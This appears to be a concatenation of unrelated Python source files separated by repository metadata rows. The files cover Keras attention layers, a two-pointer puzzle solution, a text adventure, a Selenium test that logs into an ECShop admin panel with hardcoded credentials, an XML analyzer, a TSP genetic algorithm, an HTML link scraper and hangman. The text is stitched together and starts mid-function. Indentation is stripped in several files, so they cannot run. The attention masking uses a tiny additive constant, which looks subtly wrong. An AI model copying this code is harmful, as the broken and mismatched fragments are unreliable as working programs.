kernel_sizes: list,
padding: str,
conv_activation_func: str,
) -> typing.Any:
inputs = keras.layers.Dense(filters)(input_)
shortconn = inputs
for kidx, kernel_size in enumerate(kernel_sizes, 1):
if kidx % 2 == 0:
inputs = keras.layers.Add()([inputs, shortconn])
shortconn = inputs
else:
H = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation=conv_activation_func
)(inputs)
T = keras.layers.Conv1D(
filters,
kernel_size,
padding=padding,
activation='sigmoid'
)(inputs)
inputs = keras.layers.Add()([
keras.layers.Multiply()([H, T]),
keras.layers.Multiply()([inputs, keras.layers.Lambda(lambda x: 1.0-x)(T)])
])
return inputs
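    # (Editor's note) Odd steps above apply a highway layer: H = Conv1D + activation,
    # T = sigmoid gate, output = H*T + input*(1-T); even steps add a residual shortcut
    # back to the previous checkpoint before continuing.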
@staticmethod
def bi_attention(
tensors: typing.Any
) -> typing.Any:
p_enc, q_enc, p_mask, q_mask = tensors
score = ConvHighway.bilinear(p_enc, q_enc)
q_mask_ex = K.expand_dims(q_mask, 1) # batch x 1 x q_len
p_mask_ex = K.expand_dims(p_mask, 1) # batch x 1 x p_len
score_ = K.softmax(
K.expand_dims(
K.tf.reduce_max(
ConvHighway.mask_logits(score, p_mask_ex), axis=1), axis=1), -1) # batch x 1 x p_len
#score_x = K.tf.tile(score_, [1, K.tf.shape(p_enc)[1], 1])
score_t = K.softmax(
ConvHighway.mask_logits(K.tf.transpose(score, (0, 2, 1)), q_mask_ex)
) # batch x p_len x q_len
p2q = K.batch_dot(score_, p_enc) # batch x 1 x embedding_size
q2p = K.batch_dot(score_t, q_enc) # batch x p_len x embedding_size
concat = K.tf.concat([p_enc, q2p, p_enc*p2q, p_enc*q2p], axis=-1)
return concat
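    # (Editor's note) bi_attention follows a BiDAF-style co-attention: a bilinear score
    # matrix produces query-to-passage and passage-to-query context vectors, which are
    # concatenated as [p, q2p, p * p2q, p * q2p] along the feature axis.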
@staticmethod
def mask_logits(
inputs: typing.Any,
mask: typing.Any
) -> typing.Any:
mask = K.cast(mask, K.tf.float32)
return inputs * mask + 1e-12 * (1. - mask)
@staticmethod
def bilinear(
p_enc: typing.Any,
q_enc: typing.Any
) -> typing.Any:
"""
Args:
p_enc: (batch_size, p_len, embed_size)
q_enc: (batch_size, q_len, embed_size)
Ouput:
(batch_size, p_len, q_len)
"""
p = K.tf.transpose(p_enc, (0, 2, 1))
with K.tf.variable_scope("attn_weight", reuse=K.tf.AUTO_REUSE):
hidden_dim = q_enc.get_shape()[-1]
attn_W = K.tf.get_variable("AttnW",
shape=[hidden_dim, hidden_dim],
dtype=K.tf.float32)
w_q = K.dot(q_enc, attn_W)
out = K.batch_dot(w_q, p) # batch x q_len x p_len
return out
| true |
d1e000c81aa47afcd2a295070019c7caa37b24b3 | Python | chahtk/algostudy | /yang/20210309/3273.py | UTF-8 | 315 | 3.046875 | 3 | [] | no_license |
import sys
n=int(sys.stdin.readline())
k=list(map(int,sys.stdin.readline().split()))
x=int(sys.stdin.readline())
k.sort()
count=0
left=0
right=len(k)-1
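# Two-pointer scan over the sorted list: move the ends inward and count the pairs
# whose sum equals x (the BOJ 3273 inputs are distinct, so each pair is counted once).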
while left<right:
tmp=k[left]+k[right]
if tmp == x :
count += 1
if tmp < x :
left += 1
continue
right -= 1
print(count)
| true |
a5db23ea93a848c5f57c89db1b3dad1a3dc15fd3 | Python | rockymoran/py_work_scripts | /misc/adventure.py | UTF-8 | 763 | 3.8125 | 4 | [] | no_license |
# rocco's adventure game
class Player:
def __init__(self):
self.p_name = input("Name? ")
self.stamina = 100
self.inventory = Inventory()
class Inventory:
def __init__(self):
self.equipment = "fishing pole"
self.items = ""
class Level:
def __init__(self):
self.level = ""
def welcome():
print("Welcome to this cool game.")
print("Let's get started.")
new_player = Player()
return new_player
def main():
continue_playing = True
new_player = welcome()
while continue_playing:
print(new_player.__dict__)
print(new_player.inventory.__dict__)
continue_playing = False
return print("Thanks for playing!")
if __name__ == '__main__':
main()
| true |
892df9c818ab97d731b782f8d8c3f8fe5580ea56 | Python | lisa906673062/webauto-1 | /ECShop_qxgl_glylb_002.py | UTF-8 | 2,151 | 2.671875 | 3 | [] | no_license |
'''
Add a new administrator account
and assign permission groups to it
'''
from selenium import webdriver
import time
from selenium.webdriver.common.by import By
driver = webdriver.Chrome()
driver.maximize_window()
url = 'http://192.168.1.120/upload/admin'  # admin backend
driver.get(url=url)
driver.implicitly_wait(10)  # implicit wait
time.sleep(2)
user = 'admin'
pwd = 'banxian123'
driver.find_element(By.NAME,'username').clear()
driver.find_element(By.NAME,'username').send_keys(user)  # enter the username
driver.find_element(By.NAME,'password').clear()
driver.find_element(By.NAME,'password').send_keys(pwd)  # enter the password
driver.find_element(By.NAME,'remember').click()  # tick "remember password"
driver.find_element(By.CLASS_NAME,'button').click()  # click the login button
time.sleep(2)
# Privilege management -> administrator list
driver.switch_to.frame("menu-frame")
driver.find_element(By.XPATH,'//ul[@id="menu-ul"]/li[8]').click()
driver.find_element(By.XPATH,'//ul[@id="menu-ul"]/li[8]/ul/li[1]/a').click()
driver.switch_to.default_content()
# Add a new administrator
driver.switch_to.frame("main-frame")
driver.find_element(By.XPATH,'/html/body/h1/span[1]/a').click()
# Enter the administrator's details
username = "zho3l1ia1"
emil = "906312a01@qq.com"
pwd1 = "abc123"
pwd2 = "abc123"
driver.find_element(By.NAME,'user_name').clear()
driver.find_element(By.NAME,'user_name').send_keys(username)  # username
driver.find_element(By.NAME,'email').clear()
driver.find_element(By.NAME,'email').send_keys(emil)  # email
driver.find_element(By.NAME,'password').clear()
driver.find_element(By.NAME,'password').send_keys(pwd1)  # password
driver.find_element(By.NAME,'pwd_confirm').clear()
driver.find_element(By.NAME,'pwd_confirm').send_keys(pwd2)  # confirm password
driver.find_element(By.CSS_SELECTOR,'input[type="submit"]').click()  # submit
time.sleep(3)
driver.save_screenshot("D:\workspace\img\qxgl_glylb_002_新增管理用户.png")
# Assign permission groups
ele = driver.find_elements(By.NAME,'chkGroup')
ele[0].click()
ele[1].click()
ele[2].click()
ele[3].click()
time.sleep(1)
driver.find_element(By.NAME,'Submit').click()
driver.save_screenshot("D:\workspace\img\qxgl_glylb_002_权限分配.png")
driver.switch_to.default_content()
# Quit the browser
driver.quit()
| true |
7c029b32a98ae130cd64185969ec50ae09d65dcc | Python | kanael/omnomnom | /munch.py | UTF-8 | 1,170 | 2.984375 | 3 | [] | no_license |
import json, glob, os
def parse_price(s):
return float(str(s).replace('₪','').strip())
def munch_restaurants():
restaurants = []
for restaurant_file in glob.glob("scraps/restaurants/*"):
menu_file = restaurant_file.replace("restaurants", "menus")
restaurant_id = restaurant_file.replace("restaurants", "")
restaurant_info = json.load(open(restaurant_file))
print (restaurant_id)
if not os.path.isfile(menu_file):
print ("no menu")
continue
restaurant_info["id"] = restaurant_id
restaurant_info["dishes"] = []
restaurants.append(restaurant_info)
menu_info = json.load(open(menu_file))
dishes = menu_info["dishes"]
if (len(set([d["name"] for d in dishes])) != len(dishes)):
print ("duplicate dishes")
continue
for i, dish in enumerate(dishes):
print("#%s" % (i, ))
dish["price"] = parse_price(dish["price"])
dish["restaurant_id"] = restaurant_id
restaurant_info["dishes"].append(dish)
return restaurants
json.dump(munch_restaurants(), open("all.json", "w"))
| true |
9054b84df3d7c88bbe6e42d41d55c06a4c549ad2 | Python | KLyudmyla/xml_analyzer | /src/xml_analyzer.py | UTF-8 | 3,895 | 2.953125 | 3 | [] | no_license |
import sys
import bs4
import logging
from bs4 import BeautifulSoup
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class XPath:
@staticmethod
def get_soup(file: str) -> BeautifulSoup:
f = open(file)
soup = BeautifulSoup(f, features="lxml")
f.close()
return soup
@staticmethod
def compare(origin: dict, other: dict) -> bool:
return origin["text"].lower().strip() == other["text"].lower().strip() or origin["attrs"].get("id") and \
origin["attrs"]["id"] == other["attrs"].get("id") or \
origin["attrs"].get("class") and \
origin["attrs"]["class"] == other["attrs"].get("class")
def look_for_children_or_result(self, child: bs4.element.Tag, origin: dict) -> dict or None:
try:
other = {"attrs": child.attrs, "text": child.text}
if self.compare(origin, other):
return {"result": child}
else:
return {"child_list": list(child.children)}
except AttributeError:
return None
def look_for_result(self, button_parent: bs4.element.Tag, button_origin: dict):
button_in = list(button_parent.children)
result = None
while not result and button_in:
child_list = []
# next look for button in list of child or deeper
for child in button_in:
if self.look_for_children_or_result(child, button_origin) is None:
continue
elif self.look_for_children_or_result(child, button_origin).get("result"):
result = self.look_for_children_or_result(child, button_origin)["result"]
return result
else:
child_list.append(self.look_for_children_or_result(child, button_origin)["child_list"])
button_in = child_list
return None
def find_element(self, origin_file: str, other_file: str,
id_name: str = "make-everything-ok-button") -> dict or None:
soup = self.get_soup(origin_file)
soup_other = self.get_soup(other_file)
# find attrs and text of original button
button = soup.find(id=id_name)
button_origin = {"attrs": button.attrs, "text": button.text}
# find list of patents for original button
path = []
parents_origin = list(button.parents)
for parent in parents_origin:
path.append((parent.name, parent.attrs))
# look for first parent of original button that we have in other document as well
result = None
for parent in path:
button_parent = soup_other.find_all(attrs=parent[1])
if button_parent:
# look for list of children for that element
for item in button_parent:
result = self.look_for_result(item, button_origin)
if result:
logging.info(f"element was found in the new file: {result}")
return result
return result
@staticmethod
def xpath(element: bs4.element.Tag) -> str:
tags = []
child = element if element.name else element.parent
for parent in child.parents:
siblings = parent.find_all(child.name, recursive=False)
tags.append(
child.name if 1 == len(siblings) else '%s[%d]' % (
child.name,
next(i for i, s in enumerate(siblings, 1) if s is child)
)
)
child = parent
tags.reverse()
return '/%s' % '/'.join(tags)
def run():
element = XPath().find_element(origin_file=sys.argv[1], other_file=sys.argv[2])
path = XPath.xpath(element)
logging.info(f"XPath:: {path}")
return path
run()
| true
|
f8d656f5b90fc7dd4a0c92b1d6ae8279f179b47a
|
Python
|
jjauzion/salesman_problem
|
/src/optimisation.py
|
UTF-8
| 3,619
| 3.03125
| 3
|
[] |
no_license
|
# -*- coding: utf-8 -*-
import random
import matplotlib.pyplot as plt
import time
import math
from src.city import City
from src.individual import Individual
from src.population import Population
import src.param as param
class Optimisation():
"""Class Optimisation run the genetic algorithm to solve the TSP"""
def __init__(self, city_map="random"):
"""
Create a new class instance with a list of city to visit.
Number of cities in the list is defined in the param package.
Options:
city_map="random" : cities have random coordinates
city_map="circle" : cities are distributed around a circle.
The radius defined by max_x in the param package
"""
self.city2travel = []
if city_map == "random":
for i in range(param.nb_of_city):
self.city2travel.append(City(param.max_x, param.max_y))
self.x_min = 0
self.x_max = param.max_x
self.y_min = 0
self.y_max = param.max_y
elif city_map == "circle":
a = b = 0
r = param.max_x
for theta in range(0, 360, 360 // param.nb_of_city):
x = a + r * math.cos(theta * math.pi / 180)
y = b + r * math.sin(theta * math.pi / 180)
new_city = City(1)
new_city.setXY(x, y)
self.city2travel.append(new_city)
self.x_min = -param.max_x
self.x_max = param.max_x
self.y_min = -param.max_y
self.y_max = param.max_y
else:
raise ValueError("Wrong city map option to initialise Optimisation")
def run(self, max_iter, show=None):
"""
Run the optimisation loop until ...
If show="convergence", the convergence curve will be printed at each step.
If show="best", the best individue of the current population will be shown.
"""
population = Population()
population.random_population(self.city2travel, param.population_size)
self.best_fitness = [population.best_performer.fitness]
x_convergence = [0]
if show:
if show == "best":
(x, y) = population.best_performer.get_plot_data()
x_min = self.x_min
x_max = self.x_max
y_min = self.y_min
y_max = self.y_max
elif show == "convergence":
(x, y) = (x_convergence, self.best_fitness)
x_min = 0
x_max = max_iter
y_min = 0
y_max = self.best_fitness[0]
else:
raise ValueError("Wrong option for show")
plt.show()
plt.axis([x_min, x_max, y_min, y_max])
axes = plt.gca()
line, = axes.plot(x, y, 'r-')
for i in range(1, max_iter):
population = population.next_generation()
if Population.final:
break
self.best_fitness.append(population.best_performer.fitness)
if show:
x_convergence.append(i)
if show == "best":
(x, y) = population.best_performer.get_plot_data()
elif show == "convergence":
(x, y) = (x_convergence, self.best_fitness)
line.set_xdata(x)
line.set_ydata(y)
plt.draw()
plt.pause(1e-17)
time.sleep(0.01)
if show:
plt.show()
return population
| true
|
1654606218f4866df09a8fee07ffa201e2a9bd28
|
Python
|
3esawe/Gabumon
|
/main/HTMLscanner.py
|
UTF-8
| 2,208
| 2.6875
| 3
|
[] |
no_license
|
import requests
from bs4 import BeautifulSoup
import re
from freq.utils import writeFile
links = []
script_links = []
img_src = []
keywrods = ['a', 'img', 'script']
def source(url, out=None, js =False):
if "http://" not in url and "https://" not in url:
print("[+] You forgot to enter http:// or https://")
# print(url)
req = requests.get(url)
if out == None:
srcAnlayzer(req.text)
Links(req.text)
else:
srcAnlayzer(req.text, out)
Links(req.text, out)
def Links(source_code, out = None):
links = []
matches = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', source_code)
for match in matches:
if out == None:
print(match)
else:
writeFile(match, out)
def srcAnlayzer(source_code, out = None):
soap = BeautifulSoup(source_code,features="lxml")
for key in keywrods:
if key == 'a' and soap.a != None:
tag = soap.a
links.append([a['href'] for a in soap.find_all('a', {"href":True})])
elif key == 'script' and soap.script != None :
tag = soap.script
content = soap.script.string
script_links.append([s['src'] for s in soap.find_all('script', {'src':True})])
elif key == 'img':
tag = soap.img
if tag != None:
img_src.append([s['src'] for s in soap.find_all('img', {'src':True})])
else:
exit("No URL has been found")
if out != None:
with open(out ,'w') as handle:
for i in range(len(links[0])):
if i == 0:
handle.write('********************href links********************')
handle.write('\n%s\n' % links[0][i])
for i in range(len(script_links[0])):
if i == 0:
handle.write('\n********************script links********************\n')
handle.write('%s\n' % script_links[0][i])
for i in range(len(img_src[0])):
if i == 0:
handle.write('\n********************img links********************\n')
handle.write('\n%s\n' % img_src[0][i])
else:
for i in range(len(links[0])):
print('%s' % links[0][i])
for i in range(len(script_links[0])):
print('%s' % script_links[0][i])
for i in range(len(img_src[0])):
print('%s' % img_src[0][i])
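# --- Added usage sketch (not in the original): the URL and output file below
# are placeholders, shown commented out to avoid a network call on import.
# source("https://example.com")                    # print href/script/img links
# source("https://example.com", out="links.txt")   # write them to a file instead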
| true
|
4d2f4c081ff066a7e3f027a883d323e8318ea378
|
Python
|
sk39454/TD_2020_139454
|
/Lab 01/Lab01.py
|
UTF-8
| 2,001
| 3.234375
| 3
|
[] |
no_license
|
import math
import numpy as np
import matplotlib.pyplot as plt
import array
a=4;b=5;c=4;
delta=(b*b)+((-4)*a*c)
if delta == 0:
x1 = (-b) / (2 * a)
print('x1 = ',x1,'\n\n')
if delta > 0:
x1 = ((-b)-(math.sqrt(delta)))/(2*a)
x2 = ((-b)+(math.sqrt(delta)))/(2*a)
print('x1 = ',x1,'\n','x2 = ',x2,'\n\n')
if delta < 0:
    print('Brak miejsc zerowych')  # Polish: "No real roots"
xcords1 = [] ; acords = [] ; xcords = [] ; ycords = [] ; zcords = [] ; ucords = [] ; vcords1 = [] ;vcords2 = [] ;vcords3 = [] ; pcords = []
x=-10
while x < 10:
xcords1.append(x)
fx = (a * (x * x)) + (b * x) + c
acords.append(fx)
x=x+0.01
x=round(x,2)
x=0
while x < 1:
xcords.append(x)
fx = (a * (x * x)) + (b * x) + c
funkcja = (2 * (fx * fx)) + (12*math.cos(x))
ycords.append(funkcja)
funkcja2 = (math.sin(2*math.pi*7*x)*fx)-0.2*math.log((abs(funkcja)+math.pi),10)
zcords.append(funkcja2)
funkcja3 = math.sqrt(abs(funkcja*funkcja*funkcja2))-1.8*math.sin(0.4*x*funkcja2*funkcja)
ucords.append(funkcja3)
if 0.22 > x >= 0:
funkcja41 = (1-(7*x))*math.sin((2*math.pi*x*10)/(x+0.04))
vcords1.append(funkcja41)
if 0.22 <= x < 0.7:
funkcja42 = 0.63 * x * math.sin(125*x)
vcords2.append(funkcja42)
if 1 >= x >= 0.7:
funkcja43 = math.pow(x,-0.662)+0.77*math.sin(8*x)
vcords3.append(funkcja43)
n=1
N=45
wynik=0
while n < N :
funkcja5=(math.cos(12*x*(n*n))+math.cos(16*x*n))/(n*n)
wynik=wynik+funkcja5
n+=1
pcords.append(wynik)
x=x+(1/22050)
x=round(x,6)
fig, axs=plt.subplots(6)
fig.suptitle('Vertically stacked subplots')
axs[0].plot(xcords1,acords)
axs[1].plot(xcords,ycords)
axs[2].plot(xcords,zcords)
axs[3].plot(xcords,ucords)
# Plot 4
len1=len(vcords1)
len2=len(vcords1)+len(vcords2)
len3=len2+len(vcords3)
axs[4].plot(xcords[:len1],vcords1)
axs[4].plot(xcords[len1:len2],vcords2)
axs[4].plot(xcords[len2:len3],vcords3)
axs[5].plot(xcords,pcords)
plt.show()
| true
|
0073f11d8668d96bd13c6276b9ebe662ea98dc5e
|
Python
|
amritaravishankar/Hangman
|
/hangman_main.py
|
UTF-8
| 4,425
| 4.21875
| 4
|
[] |
no_license
|
import random
from words import word_list
def get_word():
word = random.choice(word_list)
return word.upper()
def play(word):
word_completion = "_ " * len(word)
not_guessed = True
guessed_words = []
guessed_letters = []
tries = 6 # (head + body + 2 hands + 2 legs)
print("\n")
print("----------------------HANGMAN-----------------------")
print('The rules of the game are easy:')
print('Guess the word by one letter at a time or the entire word!')
print("Let's play!!!")
print(display_hangman(tries))
print(word_completion)
print("\n")
while not_guessed and tries > 0:
guess = input("Please guess a letter or a word: ").upper()
if len(guess) == 1 and guess.isalpha():
if guess in guessed_letters:
print("You've already guessed ", guess, " earlier!")
elif guess not in word:
print(guess, "is not in the word")
tries = tries - 1
guessed_letters.append(guess)
else:
print("Good Job, ", guess, " is in the word")
guessed_letters.append(guess)
word_list = word_completion.split()
for i in range(len(word)):
if word[i] == guess:
word_list[i] = guess
word_completion = ' '.join(word[0] for word in word_list)
if "_ " not in word_completion:
not_guessed = False
elif len(guess) == len(word) and guess.isalpha():
if guess in guessed_words:
print("You've already guessed ", guess, " earlier!")
elif guess != word :
print(guess, " is not the word.")
tries = tries-1
guessed_words.append(guess)
else:
not_guessed = False
word_completion = word
else:
print("Not a valid guess")
print(display_hangman(tries))
print(word_completion)
print("\n")
if not not_guessed:
print("Congrats, you guessed the word! You win!")
else:
print("Sorry, you ran out of tries. The word was " + word + ". Maybe next time!")
def display_hangman(tries):
stages = [ # final state: head, torso, both arms, and both legs
"""
--------
| |
| O
| \\|/
| |
| / \\
-
""",
# head, torso, both arms, and one leg
"""
--------
| |
| O
| \\|/
| |
| /
-
""",
# head, torso, and both arms
"""
--------
| |
| O
| \\|/
| |
|
-
""",
# head, torso, and one arm
"""
--------
| |
| O
| \\|
| |
|
-
""",
# head and torso
"""
--------
| |
| O
| |
| |
|
-
""",
# head
"""
--------
| |
| O
|
|
|
-
""",
# initial empty state
"""
--------
| |
|
|
|
|
-
"""
]
return stages[tries]
def main():
word = get_word()
play(word)
answer = input("Play again? Y/N ").upper()
if answer == "Y":
word = get_word()
play(word)
if __name__ == "__main__":
main()
| true
|
080ce631b7ce896d9650d31eb660b640fae0695f
|
Python
|
CRingrose94/ProjectEuler
|
/problems_000_099/Euler 005.py
|
UTF-8
| 603
| 3.890625
| 4
|
[] |
no_license
|
def check_divisibility(n):
"""Check if n is divisible by all numbers up to 20.
Being divisible by numbers 11->20 means it is implicitly divisible by numbers 1->10 too.
"""
for divisor in range(11, 21):
if n % divisor != 0:
return False
return True
def compute():
"""Calculates the smallest positive number evenly divisible by 1->20.
The lowest common factor of {1, 2 ... 20} is 2520, so this is the increment.
"""
x = 2520
while not check_divisibility(x):
x += 2520
return x
if __name__ == '__main__':
print(compute())
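# --- Added cross-check (not in the original): the target is simply lcm(1..20).
# math.lcm needs Python 3.9+, so this is guarded as an optional sanity check.
if __name__ == '__main__':
    import math
    if hasattr(math, 'lcm'):
        assert compute() == math.lcm(*range(1, 21))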
| true
|
da1f4c56e40aacbb29b1690a57b18b8f5a68d15a
|
Python
|
denny-Madhav/PYTHON-BASIC-PROJECTS
|
/list/split challenge.py
|
UTF-8
| 367
| 3.890625
| 4
|
[] |
no_license
|
import random
print('Hai, welcome.!! Enter names of all customers with "," in between and let me choose one customer to pay the bill. \n ')
names=input("enter here : ")
sname=names.split(",")
print("\nThe name are : ")
print(*sname,sep="\n")
limit=len(sname)
ran=random.randint(0,limit-1)
print(f"\nWell i choose {sname[ran]} to pay the bill.!")
| true
|
580d8c3e55a8a69b0cbdfc2e60908595ace60a51
|
Python
|
yumensiye/firstfortest
|
/applydata.py
|
UTF-8
| 331
| 2.8125
| 3
|
[] |
no_license
|
test = "[15Fall . MS . AD无奖 ] [ DateScience/Analytics @ MSDS@NYU ] - 2015-03-07 - T : 107 + G : 321 () 本科:南大,浙大,复旦,上交 , ... 2 3"
new_string = test.replace(" " , "").split("]")
univer_info = new_string[1].replace("[", "").split("@")
date = new_string[2].split("-")
print(date)
print(univer_info)
| true
|
dd43b912def80fcd32d5e5ce215b9e14d86ac3d9
|
Python
|
ronzohan/bank_app
|
/test/unit/account_test.py
|
UTF-8
| 539
| 3.25
| 3
|
[] |
no_license
|
import unittest
from bankapp.account import Account
class TestAccount(unittest.TestCase):
def test_account_object_returns_current_balance(self):
account = Account(001, 50)
self.assertEqual(account.account_number, 001)
self.assertEqual(account.balance, 50)
def test_accout_balance_is_string(self):
acc = Account("001", "50")
self.assertEqual(acc.balance, acc.balance)
def test_accout_balance_is_invalid_number(self):
self.assertRaises(TypeError, Account, "001", "abc")
| true
|
1a3dd4fd8c67a1dc335f0b7423d99bda4038aaee
|
Python
|
jlmurphy3rd/code-outhouse
|
/StructuresInPython/src/root/nested/DictionaryExercise.py
|
UTF-8
| 511
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
'''
Created on May 18, 2016
@author: John
'''
name = raw_input("Enter file:")
if len(name) < 1 : name = "mbox-short.txt"
handle = open(name)
counts = dict()
for line in handle:
wds = line.split()
if len(wds) < 2 : continue
if wds[0] != "From" : continue
email = wds[1]
counts[email] = counts.get(email,0) + 1
bigcount = None
bigname = None
for name,count in counts.items():
if bigname is None or count > bigcount:
bigname = name
bigcount = count
print bigname, bigcount
| true
|
6136f7f44b436c13545329d0db21fdb9565602e3
|
Python
|
ganyc717/Gobang
|
/graphic.py
|
UTF-8
| 1,947
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
import tkinter
import config as cfg
from game import Board
class graphicBoard(Board):
def __init__(self):
super(graphicBoard,self).__init__()
self.root = tkinter.Tk()
self.root.geometry('600x600')
self.block_size = 500 // (cfg.board_size - 1)
self.board_width = self.block_size * (cfg.board_size - 1)
self.piece_size = min(30,self.block_size / 1.5)
self.canvas=tkinter.Canvas(self.root,width=600,height=600,bg='gray')
self.canvas.pack()
for i in range(cfg.board_size):
# 50 board margin
self.canvas.create_line(50 + i * self.block_size, 50, 50 + i * self.block_size, 50 + self.board_width,
width=2)
self.canvas.create_line(50, 50 + i * self.block_size, 50 + self.board_width, 50 + i * self.block_size,
width=2)
self.canvas.bind('<Button-1>', self.draw_next_piece_by_click)
self.root.mainloop()
def draw_piece(self,x,y):
if self.current_player:
color = "white"
else:
color = "black"
pix_x_position = 50 + x * self.block_size - self.piece_size / 2
pix_y_position = 50 + y * self.block_size - self.piece_size / 2
self.canvas.create_oval(pix_x_position, pix_y_position, pix_x_position + self.piece_size,
pix_y_position + self.piece_size, fill=color)
self.move(x + y * cfg.board_size)
def draw_next_piece_by_click(self,event):
x = event.x - 50
y = event.y - 50
if x < 0 or y < 0 or x > self.board_width or y > self.board_width:
# the click out of the board
return
x = round(x / self.block_size)
y = round(y / self.block_size)
self.draw_piece(x,y)
end,winner = self.end_game()
if end:
print("end winner is ",winner)
graphicBoard()
| true
|
ccdcee0ee1d67c023f28aa8f99cad03e797aeec5
|
Python
|
tbohne/AOC17
|
/day7/main.py
|
UTF-8
| 3,383
| 3.140625
| 3
|
[] |
no_license
|
import sys
from collections import *
import itertools
stuff = []
# Part 1
def solve_part1(arr):
sol1 = ""
for i in input:
if "->" in i:
x = i.strip().split("->")
arr.append(x)
not_in = True
for i in arr:
for j in arr:
if i != j:
if i[0].split()[0] in j[1]:
not_in = False
if not_in:
sol_with_num = i[0]
sol1 = i[0].split()[0]
print("solution part1: ", sol1)
not_in = True
return sol_with_num
# Part2
class Node:
def __init__(self, name, weight):
self.name = name
self.children = []
self.weight = weight
def add_child(self, child):
self.children.append(child)
def get_weight(self):
sum = self.weight
for i in self.get_children_weights():
sum += i
return sum
    def get_children_weights(self):
        if len(self.children) != 0:
            children_weights = []
            for child in self.children:
                children_weights.append(child.get_weight())
            return children_weights
        else:
            return [0]
def solve_part2(root, arr, node_dict, first_root, layer, test_vals):
global stuff
print("REC", root)
sum_for_root = 0
tmp_vals = []
for i in arr:
if i[0] == root:
next_level = i[1].split(',')
for j in next_level:
for k in arr:
if j.strip() in k[0]:
solve_part2(k[0], arr, node_dict, first_root, layer + 1, test_vals)
# print("rec done", root)
# sum = 0
for l in next_level:
if root not in first_root:
tmp = node_dict[l.strip()].replace('(', '').replace(')', '')
# print("l: ", l, " --> ", tmp)
sum_for_root += int(tmp)
tmp_vals.append(int(tmp))
solve_part2(l + ' ' + node_dict[l.strip()], arr, node_dict, first_root, layer + 1, test_vals)
# sum += int(node_dict[l.strip()].replace('(', '').replace(')', ''))
# if root not in first_root:
# print(sum + int(node_dict[root.split()[0]].replace('(', '').replace(')', '')))
sum_for_root += int(node_dict[root.split()[0]].replace('(', '').replace(')', ''))
tmp_vals.append(int(node_dict[root.split()[0]].replace('(', '').replace(')', '')))
# print("SUM FOR REC: ", sum_for_root)
layer = 0
if len(tmp_vals) > 1:
print("END REC: ", root, "weight: ", sum(tmp_vals))
del tmp_vals[-1]
stuff += tmp_vals
# print(stuff)
if root in important:
# print("RESET", root)
stuff = []
if __name__ == '__main__':
input = sys.stdin.readlines()
arr = []
sol_with_num = solve_part1(arr)
# Part 2
# We will have to build up the tree
root_with_num = sol_with_num
first_root = root_with_num
print(first_root)
# print("root: ", root_with_num)
node_dict = dict()
for i in input:
x = i.split()
node_dict[x[0]] = x[1]
layer = 0
important = ""
for i in arr:
important += i[0]
test_vals = []
current = root_with_num
solve_part2(root_with_num, arr, node_dict, first_root, layer, test_vals)
| true
|
a484d1789683066e3c27122f15156e1c4f37b0cf
|
Python
|
KABIR-VERMA/HR-ANSWERSET
|
/string_perm/main.py
|
UTF-8
| 632
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'countPerms' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER n as parameter.
#
def countPerms(n):
# Write your code here
arr = [[1,1,1,1,1]]
for i in range(1, n):
lis = arr[i-1]
temp = [lis[1]% (1000000007), (lis[0] + lis[2])% (1000000007), (lis[0] + lis[1] +\
lis[3] + lis[4])% (1000000007), (lis[2] + lis[4])% (1000000007), lis[0]% (1000000007)]
arr.append(temp)
return sum(arr[-1]) % (1000000007)
| true
|
8abc89225335888e8c9657beadddcf71cbe5c1a8
|
Python
|
Shawnsyx/graduation_project
|
/Dialogue/wo_chatbot/utils.py
|
UTF-8
| 667
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/python
# -*- coding:utf8 -*-
import json
def read_json_file(file_name):
with open(file_name, 'r', encoding='utf-8') as f:
data = json.load(f)
return data
def normalize_text(text):
return text.lower()
def find_entity(text, out, id2tag):
entity = []
positions = []
i = 0
while i < len(out):
if id2tag[out[i]] == 'B':
start = i
i += 1
while i < len(out) and id2tag[out[i]] == 'I':
i += 1
i -= 1
end = i
positions.append([start, end])
entity.append(text[start:end+1])
i += 1
return entity, positions
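# --- Added worked example (not in the original repo): the toy tag ids below are
# assumptions, chosen only to illustrate the B/I/O decoding above.
if __name__ == '__main__':
    demo_id2tag = {0: 'O', 1: 'B', 2: 'I'}
    demo_text = "ABCD"
    demo_out = [1, 2, 0, 0]  # "AB" is tagged as one entity
    print(find_entity(demo_text, demo_out, demo_id2tag))
    # -> (['AB'], [[0, 1]])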
| true
|
97645399eafba8b5d98c05fd38957fc3fe68862d
|
Python
|
mohammadali110/coursera-google-it-automation-with-python
|
/crash-course-on-python/week3/8_next_for_loop_home_and_away_team.py
|
UTF-8
| 562
| 3.828125
| 4
|
[] |
no_license
|
# teams = [ 'Dragons', 'Wolves', 'Pandas', 'Unicorns']
# for home_team in teams:
# for away_team in teams:
# What should the next line be to avoid both variables being printed with the same value?
# 1. while home_team != away_team:
# 2. for home_team == away_team:
# 3. away_team = home_team
# 4. if home_team != away_team:
# Solution:
teams = [ 'Dragons', 'Wolves', 'Pandas', 'Unicorns']
for home_team in teams:
for away_team in teams:
if home_team != away_team: #option #4
print(home_team+ " vs "+away_team, end=",")
print()
| true
|
dacabfc73eb0fd14655f1b4f1124259fa68816b3
|
Python
|
martijnvanbeers/diagnnose
|
/test/test_activation_reader.py
|
UTF-8
| 3,873
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
import os
import shutil
import unittest
from typing import List, Sequence
from torch import Tensor
from diagnnose.activations.activation_reader import ActivationReader
from .test_utils import create_and_dump_dummy_activations
# GLOBALS
ACTIVATIONS_DIM = 10
ACTIVATIONS_DIR = "test/test_data"
ACTIVATIONS_NAME = "hx_l0"
NUM_TEST_SENTENCES = 5
class TestActivationReader(unittest.TestCase):
""" Test functionalities of the ActivationReader class. """
@classmethod
def setUpClass(cls) -> None:
# Create directory if necessary
if not os.path.exists(ACTIVATIONS_DIR):
os.makedirs(ACTIVATIONS_DIR)
create_and_dump_dummy_activations(
num_sentences=NUM_TEST_SENTENCES,
activations_dim=ACTIVATIONS_DIM,
max_sen_len=5,
activations_dir=ACTIVATIONS_DIR,
activations_name=ACTIVATIONS_NAME,
num_classes=2,
)
